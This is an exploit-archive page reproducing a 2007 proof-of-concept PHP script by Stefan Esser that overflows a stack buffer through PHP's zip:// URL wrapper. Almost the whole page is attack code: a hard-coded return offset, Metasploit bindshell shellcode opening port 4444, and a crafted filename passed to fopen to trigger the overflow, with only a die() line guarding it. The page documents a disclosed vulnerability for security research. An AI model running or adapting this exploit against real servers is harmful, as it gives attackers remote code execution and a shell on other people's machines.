[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : PHP 5.2.0 / PHP with PECL ZIP <= 1.8.3 zip:// URL Wrapper BoF Exploit
# Published : 2007-03-09
# Author : Stefan Esser
# Previous Title : PHP 4.4.6 crack_opendict() Local Buffer Overflow Exploit PoC
# Next Title : PHP <= 5.2.1 substr_compare() Information Leak Exploit
<?php
////////////////////////////////////////////////////////////////////////
// _ _ _ _ ___ _ _ ___ //
// | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ | || || _ //
// | __ |/ _` || '_|/ _` |/ -_)| ' / -_)/ _` ||___|| _/| __ || _/ //
// |_||_|__,_||_| __,_|___||_||_|___|__,_| |_| |_||_||_| //
// //
// Proof of concept code from the Hardened-PHP Project //
// (C) Copyright 2007 Stefan Esser //
// //
////////////////////////////////////////////////////////////////////////
// PHP zip:// URL Wrapper Stack Buffer Overflow //
////////////////////////////////////////////////////////////////////////
// This is meant as a protection against remote file inclusion.
die("REMOVE THIS LINE");
// Offset of a POP EBP, RET inside the PHP binary
$offset = 0x080d7da3;
// linux x86 bindshell on port 4444 from Metasploit
$shellcode = "x29xc9x83xe9xebxd9xeexd9x74x24xf4x5bx81x73x13x46".
"x32x3cxe5x83xebxfcxe2xf4x77xe9x6fxa6x15x58x3ex8f".
"x20x6axa5x6cxa7xffxbcx73x05x60x5ax8dx57x6ex5axb6".
"xcfxd3x56x83x1ex62x6dxb3xcfxd3xf1x65xf6x54xedx06".
"x8bxb2x6exb7x10x71xb5x04xf6x54xf1x65xd5x58x3exbc".
"xf6x0dxf1x65x0fx4bxc5x55x4dx60x54xcax69x41x54x8d".
"x69x50x55x8bxcfxd1x6exb6xcfxd3xf1x65";
// Align the shellcode on 4 bytes
while (strlen($shellcode) % 4 != 0) $shellcode .= "X";
// Convert Offset into String and calculate size
$str = pack("L", $offset);
$len = 4096 + 32 - strlen($shellcode) - 400;
// Construct the filename
$fname = "zip://A".str_repeat("A", 400)."$shellcode".str_repeat($str, $len / 4)."#EXPLOIT";
// Trigger the EXPLOIT could also be a remote URL include
fopen($fname,"a+");
?>
# www.Syue.com [2007-03-09]